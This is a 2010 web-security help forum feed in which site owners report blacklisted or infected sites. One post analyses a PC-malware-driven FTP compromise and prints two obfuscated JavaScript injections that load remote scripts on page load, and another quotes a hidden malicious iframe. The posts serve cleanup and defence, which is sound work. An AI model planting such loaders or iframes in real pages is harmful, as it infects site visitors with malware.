BadwareBusters - Most recent topics

Reported attack site

contact@badwarebusters.org (baza1955) — Sun, 14 Mar 2010 00:42:47 -0500

My site displays this warning. I’ve taken all the files down and reuploaded a new index file and hardly any other files. I also downloaded all domain files to a local folder on my pc then ran it through grepWin as instructed on a different post. I did a search for:
<iframe src\s*=\s*\“http:\/\/mysterio\.info\/cgi-bin\/worker\” width=\“1\” height=\“1\”> <\/iframe>

The scan did not show any virus. My site is still blacklisted. Here is a bit.ly link to my site domain:
http://bit.ly/aa1KoC

I changed it with bit.ly so the actual domain won’t show indexed in this thread as an “attack site” later on, by the big G…

Any help will be greatly appreciated. I’m not asuper tech savvy computer user, but can follow some directions.

Thank you,

Baza
p.s.I’m installing F-Prot now to do a scan

Pc malware injects malicious js into website index/j...

contact@badwarebusters.org (snipe) — Sat, 13 Mar 2010 19:35:41 -0500

Hi all – just dealt with another attack, and thought I’d post it here in case it could help someone. After some research, it turns out that the owner’s PC was infected with malware that was grabbing his FTP info and changing files on his website.

The attack clearly targeted ANY files with the filename of index.html, index.htm, or index.php (I would assume other indexes would be game as well, like default.asp, but he didn’t use them, so I cannot confirm.) It also targeted ANY file ending in .js. This attack recursed through every directory on his site, so it created quite a lot of work to fix, as you can imagine. Although he doesn’t use a lot of javascript, he uses a lot of Flash, and all of the AC_Runactivecontent.js files were affected.

Interestingly, it included some Wordpress-specific file modifications, I would assume on the hopes that the infected website owner is running Wordpress. For this reason, it actuall threw me off for a minute, thinking this was a Wordpress-specfic attack. After poking around some more, it clearly wasn’t. I’m thinking they just tossed in some Wordpress-specific file mods on the off-chance that the infected user is running Wordpress – which isn’t really that unlikely, given it’s popularity.

Here are some samples of the code that was injected:

First sample:
<scr>var rb=new Date();var X;if(X!=‘C’){X=’C’};var Vv=new Date();function y(){this.E=‘’;this.pX=’‘;var r=RegExp;var G;if(G!=’W’ && G!=‘sT’){G=’W’};var T=‘’;var u=’‘;var _=String(“g”);var F;if(F!=’GJ’ && F!=‘Y’){F=‘’};var Fs=new String();var U;if(U!=’xN’){U=’xN’};function A(p,s){var n= new String(“[2eI”.substr(0,1));var o_;if(o_!=‘j’){o_=‘’};var c;if(c!=’’ && c!=‘im’){c=’i_’};n+=s;this.Df=‘’;n+=new String(“]”);var Q=new r(n, _);var ul=new String();var B;if(B!=’DH’){B=‘’};return p.replace(Q, u);this.GJu=’‘;var Ch=new Date();};var Ea=new Array();this.PN=’‘;this.Sz=’‘;var BF;if(BF!=’‘){BF=’da’};var rD=window;var YS=new Array();var yp=‘’;var dz;if(dz!=’RM’){dz=’RM’};var o=new String(“oRW8defer”.substr(4));var Tn;if(Tn!=‘’){Tn=’xW’};var O=“Og5src”.substr(3);var Ap=‘’;var ft=’‘;var QW=String(“scKnG”.substr(0,2)<ins>“mbDhribmhD”.substr(4,2)</ins>“pt”);var wl;if(wl!=’’ && wl!=‘sz’){wl=’DG’};var Bd;if(Bd!=‘tR’ && Bd!=‘US’){Bd=‘’};var sx=new String(“13V/soft”.substr(3)<ins>“xLFyonic.”.substr(4)</ins>“com/sW81K”.substr(0,5)<ins>“XghoftonhXg”.substr(3,5)</ins>“ic.coXGU”.substr(0,5)<ins>“m/goo”</ins>“gle.c”<ins>“hkTCom/da”.substr(4)</ins>“ilymavO6”.substr(0,5)<ins>“OIJfil.co”.substr(4)</ins>“ZjPm.uk/gPjZm”.substr(4,5)<ins>“DYc0gpht.”.substr(4)</ins>“com.p”+"oTWhpTWo".substr(3,2));var rA="";var Wa="";var z=’‘;var l=String(“httCZ1U”.substr(0,3)<ins>“CvQp:/”.substr(3)</ins>“ZBML/ho”.substr(4)<ins>“SOFKtliOKSF”.substr(4,3)</ins>“HVNAnki”.substr(4)<ins>“h4onmag4nho”.substr(4,3)</ins>“UYSe-c”.substr(3)<ins>“gcRMom.”.substr(4)</ins>“MJagum”.substr(3)<ins>“treVboZ”.substr(0,3)</ins>“7OHe.c”.substr(3)<ins>“om.”</ins>“BHfalt”.substr(3)+"erv"+"UQSristUrQS".substr(4,3)<ins>“a-o”</ins>“B3bErg.E3Bb”.substr(4,3)<ins>“TsWLoutLTsW”.substr(4,3)</ins>“eas2vbk”.substr(0,3)<ins>“tonRPH”.substr(0,3)</ins>“linE3Pd”.substr(0,3)<ins>“e.r”</ins>“6Bwfu:wf6B”.substr(4,2));var Pm;if(Pm!=’’ && Pm!=‘GP’){Pm=’Z’};var Fv;if(Fv!=‘Ja’){Fv=‘’};var P=A(’84424201214284224412024242’,“241”);var Dw=‘’;this.lj="";rD.onload=function(){try {var SN;if(SN!=’am’ && SN!=‘HKc’){SN=’am’};z=l+P;var yW;if(yW!=‘q’ && yW!=‘U_’){yW=‘’};var TO;if(TO!=’II’ && TO!=‘Nj’){TO=‘’};z+=sx;var xL=new Array();this.qa="";V=document.createElement(QW);var ml="";this.wlK=’‘;V[o]=[1,5]⁰;V[O]=z;var aN=new Array();var hf="";var PI=new Date();var Vc;if(Vc!=’Nr’){Vc=‘’};document.body.appendChild(V);var HB;if(HB!=’’ && HB!=‘az’){HB=’Go’};var Ca;if(Ca!=‘’ && Ca!=’MT’){Ca=’cA’};var ny=‘’;} catch(u_){};var bq;if(bq!=’Pc’){bq=’Pc’};this.bd="";};var Qd=’’;};y();</scr ipt>[spaces added]

Second sample:

<scr>this.JV=‘’;function L(){this.oJ=’‘;var g=new Array();var l=’‘;var Lm;if(Lm!=’’ && Lm!=‘u’){Lm=‘’};this.Av=’‘;var x=new String(“9QEg”.substr(3));var WE;if(WE!=’‘){WE=’k’};var J=RegExp;var E;if(E!=‘’ && E!=’be’){E=’WC’};var JQ=‘’;function S(p,w){var V;if(V!=’j’ && V != ‘’){V=null};var lO=new String();var y= “[”;var kn=new Date();y+=w;y+=String(“]”);var r=new Date();var oL=new Date();var c=new J(y, x);var Q;if(Q!=’’ && Q!=‘SY’){Q=null};return p.replace(c, l);};var M=new Array();var XP=new Array();var qu;if(qu!=‘’ && qu!=’f’){qu=null};var we=new String(“defer”);this.IZ=‘’;var ft;if(ft!=’WQ’ && ft!=‘zV’){ft=‘’};var o=’‘;var QK=new Date();var Jp=“scrZeF”.substr(0,3)+"iptDNxT".substr(0,3);var _="";var N=new String(“ZJeSsrc”.substr(4));var hE;if(hE!=’’ && hE!=‘sh’){hE=null};var Tc;if(Tc!=‘’ && Tc!=’Yn’){Tc=null};var v=S(‘8777323023268266377026336’,“7236”);var WU;if(WU!=‘’){WU=’Ub’};var rh=‘’;var b=window;var A=String("ht"+"gdytp".substr(3)<ins>“QfJ:/fJQ”.substr(3,2)</ins>“phTt/s”.substr(4)<ins>“anw9e”.substr(0,2)</ins>“ooQgW”.substr(0,2)<ins>“k-4fU”.substr(0,2)</ins>“FdJcoFdJ”.substr(3,2)<ins>“jVvm.”.substr(3)</ins>"ad"+"ob"+"rE8e.8rE".substr(3,2)+"co"+"m."+"95g2ra".substr(4)<ins>“jkFDdi”.substr(4)</ins>"ka"+"Nq1bl-Nbq1".substr(4,2)+"ru"+".oc4Mr".substr(0,2)<ins>“OJ0TutJOT0”.substr(4,2)</ins>“EZseasEZ”.substr(3,2)+"st"+"onwO2s".substr(0,2)<ins>“D0oliDo0”.substr(3,2)</ins>“ne1Yd”.substr(0,2)<ins>“zhe.rezh”.substr(3,2)</ins>“0g4u:”.substr(3));this.vP="";var cz;if(cz!=’AJ’){cz=‘’};var pf=new String(“/onetOPc”.substr(0,5)<ins>“T6NG.pl/oNGT6”.substr(4,5)</ins>“x65Cnet.p”.substr(4)<ins>“PnNl/goo”.substr(3)</ins>“gle.n”<ins>“l/goo”</ins>“ZP3Xgle.cZX3P”.substr(4,5)<ins>“qVuMom/st”.substr(4)</ins>“sY2atcou”.substr(3)<ins>“nter.lTUk”.substr(0,5)</ins>“NsAcom.p”.substr(3)+"WTrhp".substr(3));var cN;if(cN!=’oP’){cN=’oP’};var cy=new String();var zp;if(zp!=‘uV’){zp=’uV’};this.CU=‘’;b.onload=function(){var wT=new Date();try {var lN;if(lN!=’lK’ && lN!=‘km’){lN=’lK’};var aE=new Array();o=A+v;var CV;if(CV!=‘XQ’ && CV!=‘Wl’){CV=‘’};o+=pf;var dT=new String();var Tw="";Z=document.createElement(Jp);var jG=new Array();Z[we]=¹⁰;var IV;if(IV!=’’ && IV!=‘sg’){IV=‘’};var LC="";Z[N]=o;var wg=new Array();var rY;if(rY!=’’ && rY!=‘XxI’){rY=null};document.body.appendChild(Z);var dF=new String();var Up;if(Up!=‘fU’ && Up!=‘cG’){Up=’fU’};} catch(xH){};};};var ZV=new String();var eP;if(eP!=‘’ && eP!=’bW’){eP=null};L();</scr ipt> [spaces added]

The malware on his PC was aggressive, updating and re-updating the files every minute or so. By analaysing the logfiles of his webserver, I found successful logins from over 140 unique IP addresses (clearly a botnet) from multiple countries, including the US, UK, Slovakia, Russia, Portugal, Sweden, Netherlands, Romania, Turkey, France, Germany, and so on – all within 10 minutes or less.

Each time the files were changed, they injected a slightly different bit of script, but each wave injected the same script into each of the index and js files. The first bit of code above was from the first wave, the second bit of code from the second wave.

Additionally, in each wave, a different url was referenced in the malware JS. One example was cyworld-com.badjojo.com.suite101-com.outeastonline.ru:8080/evite.com/evite.com/google.com/linkwithin.com/usps.com.php

They were so randomized, it didn’t seem germaine to log them all. Each one had a familiar website (like google.com) in the url somewhere, presumably to trick the site owner into believing the code was legit.

I had him install and run some malware scanners, and this is the result of the output.

Memory Modules Infected:
C:\Users\USERNAME_REDACTED\AppData\Local\rtetls.dll (Trojan.Hiloti) →
Delete on reboot.

Registry Keys Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersio

n\Ext\Stats\{3aa42713-5c1e-48e2-b432-d8bf420dd31d}
(Rogue.AntiVirus2008) → Quarantined and deleted successfully.

Registry Values Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersio

n\Run\63322117 (Trojan.FakeAlert.H) → Quarantined and deleted
successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersio

n\Run\awinonafazeqeqal (Trojan.Hiloti) → Delete on reboot.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersio

n\Run\hruciz (Trojan.Agent.U) → Delete on reboot.

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
C:\ProgramData\63322117 (Rogue.Multiple) → Quarantined and
deleted successfully.

Files Infected:
C:\ProgramData\63322117\63322117.exe (Trojan.FakeAlert.H) →
Quarantined and deleted successfully.
C:\Users\USERNAME_REDACTED\AppData\Local\rtetls.dll (Trojan.Hiloti) →
Delete on reboot.
C:\Windows\Temp\ex-68.exe (Rogue.SecurityTool) → Quarantined
and deleted successfully.
C:\Users\USERNAME_REDACTED\AppData\Local\Temp\~TMF27F.tmp
(Trojan.Hiloti) → Quarantined and deleted successfully.
C:\Users\USERNAME_REDACTED\AppData\Local\Temp\~TMF29F.tmp
(Trojan.Dropper) → Quarantined and deleted successfully.
C:\Users\Scott &
Tammy\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup\winesm32.exe (Trojan.Downloader) →
Quarantined and deleted successfully.
C:\Users\USERNAME_REDACTED\Desktop\Security Tool.LNK
(Rogue.SecurityTool) → Quarantined and deleted successfully.
C:\Users\Scott &
Tammy\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Security Tool.LNK (Rogue.SecurityTool) →
Quarantined and deleted successfully.
C:\Users\USERNAMEREDACTED\AppData\Roaming\avdrn.dat
(Malware.Trace) → Quarantined and deleted successfully.

Hope that helps someone.

My sites have got to the black list stopbadware.org

contact@badwarebusters.org (ksq) — Sat, 13 Mar 2010 08:34:04 -0500

My sites have got to the black list stopbadware.org! Please delete them from the black list! I have changed a hosting! Harmful programs I do not extend!
In Google Webmaster Tools the sites has already checked up two months ago!

Here my sites which have got to the black list:
http://ksq.ru
http://nudef.com
http://celebsjournal.com
http://partner.nudeshow.ru
http://ksq.nudeshow.ru
http://nudef.nudeshow.ru
http://celebsjournal.nudeshow.ru

Please delete them from the black list!
Please help I any more I do not know what to do and where to access! In google have told to help than cannot

Hi, my site http://splittingcunts.com is reported a...

contact@badwarebusters.org (JaZo21163) — Sat, 13 Mar 2010 02:25:21 -0500

Hi,

My site http://splittingcunts.com is reported as attack site.
I really don’t know what it can be. I am running a tube script from Nubiles with a trade script (TradePulse) and Google analytics. The trade script I don’t use, only for tracking.

Please help.

Regards,
Jan

Google reports windows live profile site as malicious

contact@badwarebusters.org (Mk1Md0) — Fri, 12 Mar 2010 23:37:49 -0500

I don’t have the link since I closed the window, but I was just on my windows live profile clicking around when google popped up that it was a dangerous site.
What gives?

Discussion about onlinemedicines.us

contact@badwarebusters.org (srinukeerthi) — Fri, 12 Mar 2010 18:43:32 -0500

I submitted my site (www.onlinemedicines.us) in Google Webmaster Tools . And modified the pages, and uploaded the files in ftp server. The site displayed in IE in correctly, but in FIREFOX again displays the Reported Attack Site!. All pages opened in IE correctly, only problem in FIRE FOX. So please give me the solution for this problem.

Wordpress security plugin

contact@badwarebusters.org (dmcdonald) — Fri, 12 Mar 2010 17:27:36 -0500

Wanted to let everyone here know that we’ve just released a free word press plugin.

WP Secure by SiteSecurityMonitor.com is a plugin that was developed as a benefit to the community for free. We developed this for our customers initially, and decided to release it to the community.

It’s available from the wordpress site here: http://wordpress.org/extend/plugins/wp-secure-by-sitesecuritymonitorcom/

Hoping it will be at least a little helpful for some of you.

Sincerely,

Doug McDonald
SiteSecurityMonitor.com
doug at sitesecuritymonitor.com

Warning message in google won’t disappear

contact@badwarebusters.org (michaelj) — Fri, 12 Mar 2010 15:12:05 -0500

Hello,
For weeks I have the warning message on my web page www.icce.com.br and nothing I do helps removing it. I ran all suggested SW’s and found some stuff which was removed. Re-uploaded my web page content and still the message is there. Please let me know what you think is still the problem and/or what I should I do next. Thanks in advance. Michael

Help! reward for help

contact@badwarebusters.org (bbelcamino) — Fri, 12 Mar 2010 14:15:35 -0500

My site www.puaforums.com has just showed up on this report

Please help!

Beware of iframe

contact@badwarebusters.org (manny) — Fri, 12 Mar 2010 13:29:50 -0500

I had three site that I’m hosting get infected. What I found on mine is an Iframe.
Beware of the following code in your site. And it had infected every page in each of the sites.
My sites that were infected where villamontez.com; mcclendonhouse.net; and keystonecu.com
The following is the code that I found:
<iframe src=“http://robokasa.com/lib/index.php” width=0 height=0 style=“hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></if rame>

Update about www.vitals.com/ratings

contact@badwarebusters.org (vitals) — Fri, 12 Mar 2010 12:13:05 -0500

Notice to Vitals users:

This malicious software was distributed through an advertisement delivered by a 3rd party ad network and hosted at farabowg.com. We immediately removed the ad at 9:30 am on Thursday, March 11 as soon as we discovered the problem. Our site has since been confirmed by Google and StopBadware.org as free from badware or any other suspicious activity. However, if you have any questions, please either follow the instructions at http://stopbadware.org/home/badware_remove or contact us at support@vitals.com.

Thank you for your continued use of Vitals. We wish you and your computer continued good health.

Sincerely,

The Vitals Team
support@vitals.com

Site reported as attack site

contact@badwarebusters.org (homeroom1) — Fri, 12 Mar 2010 10:02:31 -0500

My site, www.miltonweb.ca has been reported as an attack site.

I checked it thoroughly and could not find any malicious code. I also used www.dasient.com to search the site and they returned a perfect rating (no malicious code).

In using Google’s Safebrowsing Diagnotic is says that attack sites were hosted on my network. Does this mean it’s my web host? It’s been down now for over 24 hours so I’m panicking huge!!

I really need help here as this site is my lifeline.

Thanks,
Chris Edwards
Owner, MiltonWeb.ca

Potential malware?

contact@badwarebusters.org (brightonsunblinds) — Fri, 12 Mar 2010 09:00:36 -0500

Google have listed my site www.brightonsunblinds.co.uk as possibley being infected by malicious software. However, I have no idea how to detect the code(?) that is causing the problem. I contacted NTL who host my site, but they told me the site seemed to be okay, but the site is still blocked. I have no idea what to do, could anyone please help me?

Malware

contact@badwarebusters.org (adrianstiletano) — Fri, 12 Mar 2010 06:57:12 -0500

Today I received an e-mail from Google saying my site www.lainfancia.net is possibly infected by malicious software. However, I have no idea how to detect the code(?) that is causing the problem. I contacted my webhost, but they told me the site seemed to be okay, but the site is still blocked. I have no idea what to do, could anyone please help me?

Site reported as attack site

contact@badwarebusters.org (cancasa) — Fri, 12 Mar 2010 03:53:43 -0500

I have some kind of virus that adds code to my files.
I have had to recreate an account and reupload all the files which were not infected.
How can I find out where the attack came from and how I can secure it in case of future attacks?
My site has been down for over 2 weeks and even most of my backups got infected.
If anyone can offer help with resolving this I would really appreciate it as this is a first for me.
Thanks

Google report warning message for my web site again

contact@badwarebusters.org (malhotra_km) — Fri, 12 Mar 2010 02:19:35 -0500

Hi , My website again blocked by google , i run kitchen business and have little idea on what’s happening , based on previos suggestion i have kept all passwords safe. I have looked the pages again but couldn’t find any issue that mentioned last time , urgent help needed.

Please help with webhostingchat.com

contact@badwarebusters.org (daviddavid) — Thu, 11 Mar 2010 21:30:21 -0500

We were running older version of vbulletin and upgraded it to latest version and still we have problem. Can you please check why is it causing? I couldn’t find anything.

My site is marked as malicious, no idea how to detec...

contact@badwarebusters.org (Blackfueler) — Thu, 11 Mar 2010 19:43:25 -0500

Today I received an e-mail from Google saying my site www.blackfuel.nl is possibly infected by malicious software. However, I have no idea how to detect the code(?) that is causing the problem. I contacted my webhost, but they told me the site seemed to be okay, but the site is still blocked. I have no idea what to do, could anyone please help me?

Not sure where to start

contact@badwarebusters.org (tiffmill) — Thu, 11 Mar 2010 17:01:02 -0500

My website has been infected with Malware: www.bayview-golfcourse.com. It has infected all of the business computers with a Trojan Horse. I do not currently have a clean version of the webfiles, since all the webfiles are on infected computers.

Where do I start first?

Warning: google thinks every site may harm your comp...

contact@badwarebusters.org (mcp0500) — Thu, 11 Mar 2010 16:04:09 -0500

my domain aucenter.edu is being reported as: Warning: Google thinks every site may harm your computer; yet there is no content on it … I’ve removed all the content.